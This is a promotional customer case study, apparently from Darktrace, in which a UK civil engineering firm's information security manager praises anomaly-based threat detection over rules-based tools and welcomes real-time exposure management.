Detection of novel threats provides reassurance

Darktrace’s unique approach to cybersecurity added a key benefit. The team’s previous tool took a rules-based approach – which was only good if the next attack featured the same characteristics as the ones on which the tool was trained.

“Darktrace looks for anomalous behavior, and we needed something that detected and responded based on use cases, not rules that might be out of date or too prescriptive,” their Information Security Manager. “Our existing provider could take a couple of days to update rules and signatures, and in this game, speed is of the essence. Darktrace just does everything we need - without delay.”

Where rules-based tools must wait for a threat to emerge before beginning to detect and respond to it, Darktrace identifies and protects against unknown and novel threats, speeding identification, response, and recovery, minimizing business disruption as a result.

Looking to the future

With Darktrace in place, the UK-based civil engineering company team has reallocated time and resources usually spent on detection and alerting to now tackle more sophisticated, strategic challenges. Darktrace has also equipped the team with far better and more regularly updated visibility into potential vulnerabilities.

“One thing that frustrates me a little is penetration testing; our ISO accreditation mandates a penetration test at least once a year, but the results could be out of date the next day,” their Information Security Manager. “Darktrace / Proactive Exposure Management will give me that view in real time – we can run it daily if needed - and that’s going to be a really effective workbench for my team.”

As the company looks to further develop its security posture, Darktrace remains poised to evolve alongside its partner.

Continue reading
About the author
The Darktrace Community
Your data. Our AI.
Elevate your network security with Darktrace AI